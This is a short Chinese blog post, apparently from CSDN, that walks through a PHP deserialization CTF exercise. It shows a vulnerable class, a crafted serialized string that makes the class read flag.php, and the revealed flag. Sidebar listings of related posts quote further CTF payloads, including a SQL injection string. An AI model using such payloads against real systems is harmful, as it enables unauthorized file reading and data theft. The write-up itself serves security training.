反序列化练习

最新推荐文章于 2024-01-18 19:37:23 发布
最新推荐文章于 2024-01-18 19:37:23 发布
阅读量398 收藏 1
点赞数
分类专栏: CTF 文章标签: ctf
本文为博主原创文章,未经博主允许不得转载,否则追究法律责任。
本文链接:https://blog.csdn.net/yiqiushi4748/article/details/125420402
版权
本文探讨了一段PHP源码,展示了如何通过构造特定的反序列化字符串来访问`flag.php`文件内容。在代码中,类`Flag`包含一个`files`属性,当设置该属性并调用`__toString`方法时,会输出文件内容并返回`xixixi`。博客还提及了一个条件判断,如果`2===3`则返回一个旗标字符串,但实际上这个条件不成立。博客可能涉及PHP安全和代码审计主题。
摘要由CSDN通过智能技术生成

读源码构造

在这里插入图片描述

<?php  

class Flag{  //flag.php  
    public $files;  



    public function __tostring(){  
        if(isset($this->files)){  
            echo file_get_contents($this->files); 
        return ("xixixi");
        }  
    }  
}  
?>

得到反序列化字符串O:4:"Flag":2:{s:5:"files";N;s:4:"file";s:8:"flag.php";}

Get flag

在这里插入图片描述

<br><h1>welcome</h1></br>  
<br>oh u find it </br>

<!--but i cant give it to u now-->

<?php

if(2===3){  
	return ("flag{bYpass@3s_w0nderF9l}");
}

?>
xixixi
偷一个月亮
关注
专栏目录
PHP反序列化练习
qwsn
11-19 2651
1、XCTF平台:https://adworld.xctf.org.cn/task 高阶:1.unserialize3 高阶:2.Web_php_unserialize 2、BUUCTF平台:https://buuoj.cn/challenges Web类:4.[安洵杯 2019]easy_serialize_php Web类:5.[ZJCTF 2019]NiZhuanSiWei Basic类:6.BUU CODE REVIEW 1 Web类:7.[网鼎杯 2020 青龙组]AreUSerialz Web类
序列化和反序列化的一个简单练习
qq_34787830的博客
05-04 482
using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Threading.Tasks; using
(Java)反序列化练习
最新发布
m0_46390077的博客
01-18 474
JAVA反序列化漏洞是由于开发者重写了readObject方法,该readObject方法方法调用了别的方法,最终执行到了例如Transfrom方法的危险方法。person调用talk时时调用了自己的talk,student中没有自己的talk但是student继承了person父类的talk方法。方法,该方法用于向标准输出设备(通常是控制台)打印一行字符串并自动换行。在这里,它打印出的是字符串"lin"。:这一行是在主方法内部的唯一一行代码,它调用了Java内置的。自己有了talk就调用自己的。
8月7日CTF反序列化训练
slc3315的博客
08-08 1648
题目一 题目: 思路: 根据题目提示,存在备份文件,使用御剑或者disteach进行查找,找到www.zip,下载源码进行源码分析,然后构造对应反序列化参数即可 步骤一 源码分析: class Name{ public $username; public $password; function __wakeup(){ $this->username = 'guest'; } function __destruct(){ if
PHP反序列化练习
shy的博客
11-29 1568
pikachu平台反序列化漏洞 第一题:反序列化漏洞输出XSS 地址:https://www.bihuoedu.com/vul/unserilization/unser.php 查看unser.php文件的源码: <?php class S{ var $test = "pikachu"; function __construct(){ echo $this->test; } } //O:1:"S":1:{s:4:"test";s:29:"&.
java系列化与反序列化练习
User_manxxx的博客
11-05 223
package per.llldf.lx; import java.io.Serializable; public class Product implements Serializable{ private int ID; private String name; private String property; private double price; public Product(int ID, String name, String property, d...
序列化与反序列化练习 定义1个user类 成员变量: 用户编号: int id; 用户名 : stri
09-16
对于user类的序列化和反序列化练习,我们可以通过以下步骤完成: 1. 声明一个名为User的类,该类拥有三个成员变量:id (int类型)、name (string类型)和age (int类型)。 2. 在User类中提供一个无参构造函数和一个带...
XML操作 面向对象其一(封装) 序列化 反序列化 练习
05-06
练习将重点讲解XML与面向对象编程中的封装、以及序列化和反序列化的概念。 首先,面向对象编程(Object-Oriented Programming, OOP)是程序设计的一种重要范式,它的核心思想是将数据和处理这些数据的方法封装在...
Pikachu漏洞平台练习——PHP序列化与反序列化、PHP反序列化漏洞
7Riven's blog
11-13 1065
1.序列化serialize()与反序列化unserialize() 序列化:把一个对象变成可以传输的字符串。 反序列化:把被序列化的字符串还原为对象,然后在接下来的代码中继续使用。 举例说明如下: <?php Class a{ Var $test = 'test'; } $a = new a(); Echo serialize($a);//序列化成为一个字符串形式 $b=uns...
反序列化的学习以及ctfsow_反序列化模块的练习
RealIiikun的博客
03-16 506
1.序列化:把对象转换为字节序列的过程,即把对象转换为可以存储或传输的数据的过程。例如将内存中的对象转换为二进制数据流或文件,在网络传输过程中,可以是字节或是XML等格式。2.反序列化:把字节序列恢复为对象的过程,即把可以存储或传输的数据转换为对象的过程。例如将二进制数据流或文件加载到内存中还原为对象。​ 对象序列化成的字节序列会包含对象的类型信息、对象的数据等,说白了就是包含了描述这个对象的所有信息,能根据这些信息“复刻”出一个和原来一模一样的对象。
两道反序列化例题
limenzzz的博客
05-03 1294
攻防世界: 1.Web_php_unserialize 先代码审计,发现定义了demo类,而在其中有一句 这个函数说明在销毁demo时会高亮回显file。而且前面提示flag在fl4g.php中,于是需要构造反序列化的demo类,且要绕过wake_up函数,根据上篇可知,只要输入的数据数少于规定的就可以绕过。于是需要构造 O:4:"demo":1:{s:10:"Demofile";s:8:"fl4g.php";} //原构造,未构建任何绕过 O:4:"demo":2:{s:10:"De
PTE练习】34051,34061,34073,34074,34075
leo788的博客
04-25 289
cisp-pte考试,34051,34061,34073,34074,34075练习以及总结
CTF-反序列化
qq_61774705的博客
08-15 4640
反序列化
反序列化(Unserialize)题目讲解
qq_49422880的博客
10-05 5904
[RCTF2015]EasySQL 这道题没有什么思路,就是看网上的WP写出,Sql-lib好像也有这道题。这里要使用的一种注入方法叫做二次注入。具体我就不细讲了。 直接放语句上去: admin"||(updatexml(1,concat(0x7e,(select(database()))),1))# 123"||(updatexml(1,concat(0x7e,(select(database()))),1))# ...
序列化和反序列化刷题记录
一只菜鸡
01-28 1687
BUU CODE REVIEW\ *反序列化 md5 <?php /** * Created by PhpStorm. * User: jinzhao * Date: 2019/10/6 * Time: 8:04 PM */ highlight_file(__FILE__); class BUU { public $correct = ""; public $input = ""; public function __destruct() { try {
CISP-PTE实操练习讲解
lza20001103的博客
07-05 3966
CISP-PTE实操练习讲解
CISP-PTE实操练习题讲解二(新版)
lza20001103的博客
08-06 7160
CISP-PTE实操练习题讲解二(新版)
ctfshow web入门 反序列化
Sentiment的博客
12-26 1958
web254
CISP-PTE考前练习题4
2301_79546223的博客
09-16 549
CISP-PTE考前练习
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值